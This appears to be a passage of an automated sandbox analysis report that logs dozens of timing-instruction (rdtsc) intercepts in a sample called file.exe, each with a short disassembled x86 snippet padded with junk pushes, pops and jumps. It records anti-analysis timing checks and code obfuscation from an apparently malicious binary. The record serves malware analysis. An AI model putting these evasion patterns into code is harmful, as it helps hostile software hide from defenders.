            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520B34 second address: 520B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 437377 second address: 43737C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A108FB second address: 4A1096C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F2E7D257EC3h 0x0000000b add cx, 33EEh 0x00000010 jmp 00007F2E7D257EC9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007F2E7D257EC9h 0x00000025 sbb al, FFFFFFD6h 0x00000028 jmp 00007F2E7D257EC1h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1096C second address: 4A1097E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1097E second address: 4A10983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10983 second address: 4A109B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 popad 0x00000015 push eax 0x00000016 jmp 00007F2E7D1D3442h 0x0000001b xchg eax, ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109B2 second address: 4A109B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109B6 second address: 4A109BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109BC second address: 4A109EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2E7D257EC7h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109EE second address: 4A10A26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 306E853Ah 0x00000008 mov si, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F2E7D1D343Ah 0x00000015 mov ebx, eax 0x00000017 popad 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F2E7D1D3446h 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A26 second address: 4A10A2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A2C second address: 4A10A92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3F19DEEEh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-04h] 0x0000000e jmp 00007F2E7D1D3445h 0x00000013 nop 0x00000014 jmp 00007F2E7D1D343Eh 0x00000019 push eax 0x0000001a jmp 00007F2E7D1D343Bh 0x0000001f nop 0x00000020 jmp 00007F2E7D1D3446h 0x00000025 push dword ptr [ebp+08h] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F2E7D1D343Ah 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A92 second address: 4A10AA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10AA1 second address: 4A10AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E7D1D3444h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B61 second address: 4A10B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B67 second address: 4A10BC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3443h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, esi 0x0000000d pushad 0x0000000e mov ecx, 01A2CE9Bh 0x00000013 pushfd 0x00000014 jmp 00007F2E7D1D3440h 0x00000019 sub ax, C968h 0x0000001e jmp 00007F2E7D1D343Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop esi 0x00000026 jmp 00007F2E7D1D3446h 0x0000002b leave 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10BC9 second address: 4A10BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10BCD second address: 4A10BEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10BEA second address: 4A10BF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10BF0 second address: 4A10BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10BF4 second address: 4A10BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10BF8 second address: 4A00070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c sub esp, 04h 0x0000000f xor ebx, ebx 0x00000011 cmp eax, 00000000h 0x00000014 je 00007F2E7D1D359Fh 0x0000001a mov dword ptr [esp], 0000000Dh 0x00000021 call 00007F2E819744F5h 0x00000026 mov edi, edi 0x00000028 jmp 00007F2E7D1D343Dh 0x0000002d xchg eax, ebp 0x0000002e jmp 00007F2E7D1D343Eh 0x00000033 push eax 0x00000034 jmp 00007F2E7D1D343Bh 0x00000039 xchg eax, ebp 0x0000003a jmp 00007F2E7D1D3446h 0x0000003f mov ebp, esp 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007F2E7D1D343Dh 0x0000004a xor eax, 725720A6h 0x00000050 jmp 00007F2E7D1D3441h 0x00000055 popfd 0x00000056 movzx eax, di 0x00000059 popad 0x0000005a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00219 second address: 4A0023B instructions: 0x00000000 rdtsc 0x00000002 call 00007F2E7D257EC0h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007F2E7D257EBBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0023B second address: 4A002AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 inc ebx 0x00000007 pushad 0x00000008 mov edi, 1C6BFA86h 0x0000000d pushfd 0x0000000e jmp 00007F2E7D1D3447h 0x00000013 adc esi, 71EA110Eh 0x00000019 jmp 00007F2E7D1D3449h 0x0000001e popfd 0x0000001f popad 0x00000020 test al, al 0x00000022 pushad 0x00000023 mov dx, ax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushfd 0x00000029 jmp 00007F2E7D1D3446h 0x0000002e and cl, FFFFFFB8h 0x00000031 jmp 00007F2E7D1D343Bh 0x00000036 popfd 0x00000037 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A002AF second address: 4A002F2 instructions: 0x00000000 rdtsc 0x00000002 call 00007F2E7D257EC8h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b je 00007F2E7D258063h 0x00000011 jmp 00007F2E7D257EC1h 0x00000016 lea ecx, dword ptr [ebp-14h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ax, bx 0x0000001f mov di, E5EAh 0x00000023 popad 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A002F2 second address: 4A002F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A002F8 second address: 4A002FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0035F second address: 4A003CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 pushfd 0x00000007 jmp 00007F2E7D1D3448h 0x0000000c and ch, FFFFFFC8h 0x0000000f jmp 00007F2E7D1D343Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 nop 0x00000019 pushad 0x0000001a mov edx, esi 0x0000001c pushfd 0x0000001d jmp 00007F2E7D1D3440h 0x00000022 add al, 00000028h 0x00000025 jmp 00007F2E7D1D343Bh 0x0000002a popfd 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov bx, 6ECAh 0x00000032 mov dh, ADh 0x00000034 popad 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov eax, edx 0x0000003b mov ebx, 4A44A846h 0x00000040 popad 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00460 second address: 4A004DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, 05B9B5ABh 0x00000009 popad 0x0000000a jne 00007F2EEE8A5EE7h 0x00000010 pushad 0x00000011 jmp 00007F2E7D257EBCh 0x00000016 mov ebx, eax 0x00000018 popad 0x00000019 mov ebx, dword ptr [ebp+08h] 0x0000001c jmp 00007F2E7D257EBCh 0x00000021 lea eax, dword ptr [ebp-2Ch] 0x00000024 pushad 0x00000025 mov ebx, esi 0x00000027 call 00007F2E7D257EBAh 0x0000002c pushfd 0x0000002d jmp 00007F2E7D257EC2h 0x00000032 sbb cx, 98C8h 0x00000037 jmp 00007F2E7D257EBBh 0x0000003c popfd 0x0000003d pop ecx 0x0000003e popad 0x0000003f push esp 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 call 00007F2E7D257EC1h 0x00000048 pop esi 0x00000049 mov dh, C1h 0x0000004b popad 0x0000004c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A004DE second address: 4A004E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A004E4 second address: 4A004E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A004E8 second address: 4A004EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A004EC second address: 4A0050F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b pushad 0x0000000c mov dl, ah 0x0000000e popad 0x0000000f push esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2E7D257EC1h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0050F second address: 4A00530 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2E7D1D3442h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00530 second address: 4A00536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00536 second address: 4A0053A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0053A second address: 4A0053E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0053E second address: 4A0055A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F2E7D1D343Eh 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0055A second address: 4A0057C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 mov di, FC8Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2E7D257EC0h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0061B second address: 49F0CA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 0322h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F2EEE821466h 0x00000010 xor eax, eax 0x00000012 jmp 00007F2E7D1ACB6Ah 0x00000017 pop esi 0x00000018 pop edi 0x00000019 pop ebx 0x0000001a leave 0x0000001b retn 0004h 0x0000001e nop 0x0000001f sub esp, 04h 0x00000022 mov esi, eax 0x00000024 cmp esi, 00000000h 0x00000027 setne al 0x0000002a xor ebx, ebx 0x0000002c test al, 01h 0x0000002e jne 00007F2E7D1D3437h 0x00000030 jmp 00007F2E7D1D3573h 0x00000035 call 00007F2E8196502Ch 0x0000003a mov edi, edi 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F2E7D1D343Ch 0x00000043 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0CA1 second address: 49F0CEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov bx, CB30h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F2E7D257EC2h 0x00000015 add esi, 6B35DB78h 0x0000001b jmp 00007F2E7D257EBBh 0x00000020 popfd 0x00000021 mov ah, 22h 0x00000023 popad 0x00000024 mov dword ptr [esp], ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F2E7D257EBEh 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0CEB second address: 49F0CF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0CF1 second address: 49F0CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0CF5 second address: 49F0D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F2E7D1D3449h 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2E7D1D343Dh 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0D28 second address: 49F0DD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2E7D257EC3h 0x00000009 sbb si, 22AEh 0x0000000e jmp 00007F2E7D257EC9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F2E7D257EC7h 0x0000001f adc ax, 18BEh 0x00000024 jmp 00007F2E7D257EC9h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F2E7D257EC0h 0x00000030 adc ecx, 191BC9B8h 0x00000036 jmp 00007F2E7D257EBBh 0x0000003b popfd 0x0000003c popad 0x0000003d xchg eax, ecx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 call 00007F2E7D257EBBh 0x00000046 pop eax 0x00000047 mov si, bx 0x0000004a popad 0x0000004b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0DD2 second address: 49F0E3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-04h], 55534552h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F2E7D1D343Dh 0x00000019 or si, 15B6h 0x0000001e jmp 00007F2E7D1D3441h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F2E7D1D3440h 0x0000002a jmp 00007F2E7D1D3445h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B8C second address: 4A00BCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F2E7D257EBBh 0x00000013 sbb cx, B19Eh 0x00000018 jmp 00007F2E7D257EC9h 0x0000001d popfd 0x0000001e mov edi, eax 0x00000020 popad 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00BCD second address: 4A00BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C13 second address: 4A00C19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C19 second address: 4A00C66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 47ED2C5Eh 0x00000012 jmp 00007F2E7D1D3440h 0x00000017 call 00007F2EEE818360h 0x0000001c push 76042B70h 0x00000021 push dword ptr fs:[00000000h] 0x00000028 mov eax, dword ptr [esp+10h] 0x0000002c mov dword ptr [esp+10h], ebp 0x00000030 lea ebp, dword ptr [esp+10h] 0x00000034 sub esp, eax 0x00000036 push ebx 0x00000037 push esi 0x00000038 push edi 0x00000039 mov eax, dword ptr [760A4538h] 0x0000003e xor dword ptr [ebp-04h], eax 0x00000041 xor eax, ebp 0x00000043 push eax 0x00000044 mov dword ptr [ebp-18h], esp 0x00000047 push dword ptr [ebp-08h] 0x0000004a mov eax, dword ptr [ebp-04h] 0x0000004d mov dword ptr [ebp-04h], FFFFFFFEh 0x00000054 mov dword ptr [ebp-08h], eax 0x00000057 lea eax, dword ptr [ebp-10h] 0x0000005a mov dword ptr fs:[00000000h], eax 0x00000060 ret 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F2E7D1D3447h 0x00000068 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C66 second address: 4A00C99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b pushad 0x0000000c mov edx, 38F32F30h 0x00000011 mov dx, 0E5Ch 0x00000015 popad 0x00000016 mov dword ptr [ebp-1Ch], esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C99 second address: 4A00CB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3448h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00CB5 second address: 4A00CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E7D257EBEh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00CC7 second address: 4A00CCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C0B second address: 4A10C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C0F second address: 4A10C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C13 second address: 4A10C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C19 second address: 4A10C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3443h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2E7D1D3446h 0x0000000f push eax 0x00000010 jmp 00007F2E7D1D343Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F2E7D1D3444h 0x0000001d add ax, 4548h 0x00000022 jmp 00007F2E7D1D343Bh 0x00000027 popfd 0x00000028 push esi 0x00000029 mov cx, bx 0x0000002c pop edx 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C89 second address: 4A10C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C8D second address: 4A10CA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D343Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10CA0 second address: 4A10CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 28FA224Ah 0x00000008 call 00007F2E7D257EBBh 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F2E7D257EC0h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10CCB second address: 4A10CFD instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F2E7D1D343Eh 0x0000000d sub esi, 31299C68h 0x00000013 jmp 00007F2E7D1D343Bh 0x00000018 popfd 0x00000019 popad 0x0000001a mov dword ptr [esp], esi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10CFD second address: 4A10D03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D03 second address: 4A10DA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 movzx ecx, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+0Ch] 0x0000000e pushad 0x0000000f movsx edi, ax 0x00000012 jmp 00007F2E7D1D3446h 0x00000017 popad 0x00000018 test esi, esi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F2E7D1D343Eh 0x00000021 sbb ah, 00000058h 0x00000024 jmp 00007F2E7D1D343Bh 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F2E7D1D3448h 0x00000030 sbb ah, FFFFFFB8h 0x00000033 jmp 00007F2E7D1D343Bh 0x00000038 popfd 0x00000039 popad 0x0000003a je 00007F2EEE800A77h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 mov bh, 12h 0x00000045 pushfd 0x00000046 jmp 00007F2E7D1D343Ch 0x0000004b add esi, 6519B918h 0x00000051 jmp 00007F2E7D1D343Bh 0x00000056 popfd 0x00000057 popad 0x00000058 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10DA1 second address: 4A10E0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E7D257EBFh 0x00000008 pushfd 0x00000009 jmp 00007F2E7D257EC8h 0x0000000e sub ecx, 7D46DAA8h 0x00000014 jmp 00007F2E7D257EBBh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d cmp dword ptr [760A459Ch], 05h 0x00000024 jmp 00007F2E7D257EC6h 0x00000029 je 00007F2EEE89D54Fh 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E0A second address: 4A10E10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
